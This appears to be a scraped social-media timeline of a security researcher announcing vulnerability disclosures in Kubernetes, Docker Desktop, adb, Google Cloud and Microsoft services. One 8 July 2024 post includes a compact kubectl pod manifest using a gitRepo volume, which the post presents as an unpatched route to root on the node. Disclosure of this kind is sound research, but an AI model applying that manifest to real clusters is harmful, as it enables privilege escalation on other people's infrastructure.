@ImreRad profile picture
Rad Imre @ImreRad
Joined April 2019
  • Tweets 34
  • Following 18
  • Followers 192
Photos and videos
Manually reading thousands of rejected vuln reports is a mind-killer. 🧠💀 ​I used AI to cluster years of Google Cloud VRP data to reveal exactly why reports get bounced. Hunt smarter, not harder. ​Check the insights: bughunters.google.com/learn/… ​#GoogleVRP #BugBounty #AI #Infosec

Common Reasons for Rejected Google Cloud Vulnerability Reports | Google Bug Hunters

The Google Cloud Vulnerability Reward Program (VRP) greatly values the contributions of security researchers in helping us secure Google Cloud. To improve transparency and guide your research...

bughunters.google.com
1
15
141
8,432
Rad Imre@ImreRad
8 Jul 2024
Check /tmp/poc @ host: kubectl apply -f - <<Z apiVersion: v1 kind: Pod metadata: name: x spec: {containers: [{image: i,name: c,volumeMounts: [{mountPath: /,name: g}]}],volumes: [{name: g,gitRepo: {repository: github.com/irsl/g.git,revisi…: main,directory: g/.git}}]} Z

1
4
633
Rad Imre@ImreRad
8 Jul 2024
Yes, this is a yet unpatched privesc in Kubernetes :) Full context here: irsl.medium.com/sneaky-write…

Sneaky write hook: git clone to root on k8s node

Kubernetes supports the concept of volumes (aka storage drivers). This concept makes it possible to extend or facilitate providing data to…

irsl.medium.com
2
1
3
314
Rad Imre@ImreRad
8 Jul 2024
And an article about two related projects I've been working on: bughunters.google.com/blog/6…

Blog: Securing the Container World with Policies: acjs and ctrdac

We released two new open-source projects aimed at enhancing security and flexibility in containerized and Kubernetes environments. Check out this post to learn more!

bughunters.google.com
1
1
1
206
Rad Imre@ImreRad
27 Oct 2023
Some fun for the weekend
2
216
Rad Imre@ImreRad
7 Sep 2023
Write up about the first batch of findings I reported to the Github bug bounty program: irsl.medium.com/github-bug-b… One flaw in Github Actions and a couple in Github CLI. The next article will be about Github Enterprise Server :)

Github bug bounty experiences — Actions and CLI

Github bug bounty program has celebrated its 9th birth day recently and I decided to try myself in that space.

irsl.medium.com
1
3
13
1,416
Rad Imre@ImreRad
23 Jan 2023
Docker silently fixed a privilege escalation flaw in Docker Desktop that allowed any unprivileged containers on Windows to read and modify files on the host machine. Fixed in 4.16.0. #docker #security #windows
1
2
1
255
Rad Imre@ImreRad
23 Jan 2023
In short: containers could access WSL2 features through VSOCK. As part of the mitigation effort, seccomp policy in recent versions of Docker Desktop was improved to block this address family by default.
181
Rad Imre@ImreRad
9 Sep 2022
A compromised Android Debug Bridge daemon could: CVE-2022-3168: open network connections to arbitrary destinations on the host CVE-2022-20128: write files on host during adb pull Both fixed in Platform Tools v33.0.3 Google's Firebase Test Lab no longer affected ;) #android
1
9
14
Rad Imre@ImreRad
9 Sep 2022
github.com/irsl/CVE-2022-316… github.com/irsl/CVE-2022-201…

GitHub - irsl/CVE-2022-3168-adb-unexpected-reverse-forwards: Proof of concept code to exploit flaw...

Proof of concept code to exploit flaw in adb that allowed opening network connections on the host to arbitrary destinations - irsl/CVE-2022-3168-adb-unexpected-reverse-forwards

github.com
2
4
Rad Imre@ImreRad
10 Dec 2021
Researchers, if you publish a zero day like the one in #log4j, please kindly schedule it to Monday.
1
15
Rad Imre@ImreRad
5 Nov 2021
Not a real credit card, but looks still awesome;) thanks @GoogleVRP
4
Rad Imre@ImreRad
15 Jul 2021
Golang's TLS client implementation had been vulnerable to a denial of service flaw since the very beginnings (including 1.0!). The victim golang client apps, when connecting to an attacker controlled TLS server (e.g. https), may crash (panic). github.com/alexzorin/cve-202…

GitHub - alexzorin/cve-2021-34558

Contribute to alexzorin/cve-2021-34558 development by creating an account on GitHub.

github.com
1
1
Rad Imre@ImreRad
28 Jun 2021
A yet-unfixed flaw affecting virtual machines hosted in the Compute Engine platform of Google: abusing the DHCP protocol allows taking over hosts (getting a root shell) remotely. github.com/irsl/gcp-dhcp-tak… #Google #GCP

1
10
25
Rad Imre@ImreRad
13 Apr 2021
Tech details about an elevation of privileges flaw in Microsoft's Diagnostics Hub service. github.com/irsl/microsoft-di… CVE-2021-28321 CVE-2021-28322 CVE-2021-28323

GitHub - irsl/microsoft-diaghub-case-sensitivity-eop-cve: Proof of concept code about the Microsoft...

Proof of concept code about the Microsoft Diaghub case sensitivity Elevation of Privileges vulnerability - irsl/microsoft-diaghub-case-sensitivity-eop-cve

github.com
1
1
Rad Imre@ImreRad
17 Feb 2021
Technical write-up about how I opened a reverse shell in Google's managed MySQL and Postgres platforms irsl.medium.com/dropping-a-s…

Dropping a shell in Google’s Cloud SQL (the speckle-umbrella story)

Intro

irsl.medium.com
2
2
Load more